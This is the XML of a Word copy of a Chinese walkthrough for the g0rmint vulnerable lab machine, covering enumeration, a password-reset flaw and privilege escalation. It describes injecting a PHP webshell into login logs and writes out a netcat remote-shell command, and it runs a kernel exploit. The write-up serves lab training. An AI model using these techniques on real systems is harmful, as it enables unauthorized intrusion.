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</w:pPr>
      <w:bookmarkStart w:id="11" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g0rmint靶机实战</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="t1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文章目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "g0rmint_0" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>g0rmint靶机实战</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "1_2" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1、主机发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "2_6" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2、端口扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "3_9" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3、端口详细信息扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "480http_11" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4、访问80端口--http服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "5getshell_61" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5、getshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "shell_69" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反弹shell方法一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "shell_77" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反弹shell方法二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "6_82" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6、提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "_83" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:p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"https://blog.csdn.net/weixin_43870289/article/details/104115479" \l "_100" \t "https://blog.csdn.net/weixin_43870289/article/details/_self" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="t2"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、主机发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>arp-scan -l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6591300" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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t>目标IP：192.168.232.165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="t3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、端口扫描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6591300" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50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t>开放80、22端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="t4"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、端口详细信息扫描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6591300" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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bookmarkStart w:id="4" w:name="t5"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、访问80端口–http服务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6591300" cy="2828925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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t>dirb扫一下其它目录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6591300" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19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t>依次访问：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6591300" cy="2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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6372225" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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6591300" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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t>访问robots里面的地址：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6591300" cy="3257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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6591300" cy="4486275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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t>一个登录页面，先尝试弱口令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>弱口令失败…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>查看源码：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6600825" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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t>在html源代码中发现了一个不知道是什么东西的东西</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>尝试访问一下：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6591300" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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t>访问之后依旧是404，再用dirb爆一下目录：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6600825" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17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t>访问之：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6591300" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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t>压缩包？下载看看：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6038850" cy="6705600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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670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t>网站源码，下面涉及到代码审计：绝望…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6591300" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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t>在login.php中可以看到，登录失败的时候会生成一个日志文件addlog($log, $reason);，看下这个addlog的代码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6600825" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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t>发现登录失败日志存储在/s3cr3t-dir3ct0ry-f0r-l0gs目录下，格式为年月日.php，尝试访问一下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>直接跳转到主页…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>继续看代码，在db.sql中可以看到一条插入的数据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6600825" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12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t>解密：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6600825" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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t>尝试登录无果，看到文件中有一个重置密码的文件reset.php：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6591300" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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0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t>可以看到，只需要知道一个存在的邮箱和用户名，就可以重置密码为一个时间值的哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>那就开始搜索邮箱和用户名：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6600825" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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1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t>找到一个用户：noman（w3bdrill3r@gmail.com）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>尝试重置密码：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6591300" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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2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t>成功重置，界面右下角也给出了对应的时间，遂能算出相应的哈希值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>获取重置后密码：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6591300" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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t>算出重置后的密码为：02525a60b812a7a650b2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>登录：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6591300" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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4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t>登录成功，先改个密码：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6591300" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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5" descr="IMG_28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bookmarkStart w:id="5" w:name="t6"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5、getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>查看登录日志：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6591300" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13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6" descr="IMG_28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t>登录失败日志记录着登录时的email信息，可以通过在登录的email处插入一句话木马，来获取shell：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6591300" cy="5553075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15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7" descr="IMG_28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555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t>在访问日志文件：//利用hackbar提交post参数即可执行命令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6600825" cy="3438525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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8" descr="IMG_28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t>然后尝试反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="t7"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell方法一</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>cmd=mkfifo /tmp/t;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>cmd=cat /tmp/t | /bin/sh -i 2&gt;&amp;1 | nc -l 4444 &gt; /tmp/t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>进入阻塞状态，在kali中用nc连接即可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6600825" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14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9" descr="IMG_28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6591300" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16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0" descr="IMG_28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t>在kali中用nc连接：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6591300" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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1" descr="IMG_28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bookmarkStart w:id="7" w:name="t8"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell方法二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6600825" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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2" descr="IMG_28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6581775" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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3" descr="IMG_28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t>查看kali：//拿到shell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6591300" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41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4" descr="IMG_28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bookmarkStart w:id="8" w:name="t9"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6、提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="t10"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>查看内核版本：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3362325" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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5" descr="IMG_29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t>kali搜索对应版本漏洞：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6591300" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="图片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6" descr="IMG_29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t>挑44298.c来试试，将这个文件复制到/var/www/html目录下：//开启apache服务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6591300" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="图片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7" descr="IMG_29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t>下载到靶机：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6591300" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46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8" descr="IMG_29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t>编译：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2781300" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 39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9" descr="IMG_29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t>没有安装gcc，尴尬…在kali编译好再上传吧：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6591300" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 40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0" descr="IMG_29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6591300" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="图片 41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1" descr="IMG_29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t>执行：//提示权限不够，赋权，再执行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5486400" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="图片 42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2" descr="IMG_29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t>提权成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="t11"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>在/var/www目录下又发现网站备份文件,解压发现db.sql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2124075" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="图片 43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3" descr="IMG_29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2667000" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="图片 44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4" descr="IMG_29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t>查看db.sql文件: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6591300" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="图片 45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5" descr="IMG_30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t>发现用户noman以及密码:解密去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6591300" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="图片 46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6" descr="IMG_30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t>拿到用户名：noman 密码：tayyab123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>因为这个靶机开放22端口，可以尝试去连接ssh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6600825" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="图片 47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7" descr="IMG_30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t>又翻回去看了一下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6591300" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="图片 48" descr="IMG_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8" descr="IMG_30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t>//g0rmint 有点可疑，用这个试一下：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6591300" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 49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9" descr="IMG_30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t>成功登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>然后用sudo -l 查看当前用户是否属于sudo组，接着使用sudo -i 直接获得管理员权限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6600825" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="图片 50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0" descr="IMG_30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t>//全部命令都可以运行，nice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="11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614BBD"/>
    <w:rsid w:val="101B7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customXml" Target="../customXml/item1.xml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2020-10-25T06:16:00Z</dcterms:created>
  <dc:creator>94994</dc:creator>
  <cp:lastModifiedBy>94994</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-25T06:17:29Z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